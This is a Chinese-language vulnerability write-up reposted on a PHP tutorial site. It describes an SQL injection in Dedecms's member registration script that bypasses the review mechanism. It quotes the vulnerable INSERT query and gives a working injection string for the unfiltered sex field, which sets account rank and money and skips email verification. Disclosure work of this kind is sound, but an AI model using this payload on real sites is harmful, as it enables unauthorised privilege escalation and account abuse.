网站地图    收藏   

主页 > 后端 > 网站安全 >

Dedecms SQL注射导致审核机制绕过漏洞 - 网站安全

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] Dedecms 存在SQL注射漏洞,在magic_quotes_gpc=off时,攻击者可以将恶意SQL语句带入SQL执行,导致dedecms的审核机制被绕过.需要magic_quotes_gpc=off,同样没有什么大危害的漏洞.漏洞代码如下:我们看membe...

Dedecms 存在SQL注射漏洞,在magic_quotes_gpc=off时,攻击者可以将恶意SQL语句带入SQL执行,导致dedecms的审核机制被绕过.
需要magic_quotes_gpc=off,同样没有什么大危害的漏洞.
漏洞代码如下:
 
我们看member/reg_new.php的代码$sex变量在表单是单选,程序员没做任何过滤
 
   191            $inQuery = "INSERT INTO `detest_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
   192            `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
   193           VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
   194           '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
   195     www.2cto.com      if($dsql->ExecuteNoneQuery($inQuery))
 
 
我们提交$sex=boy',100,100,'sss@xx.xx',1000,0,0,'face',0,'',1316751900,'',1316751900,'');%00
直接把rank 跟money都设置为100了等,绕过邮件审核。

 
 
作者 c4rp3nt3r

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论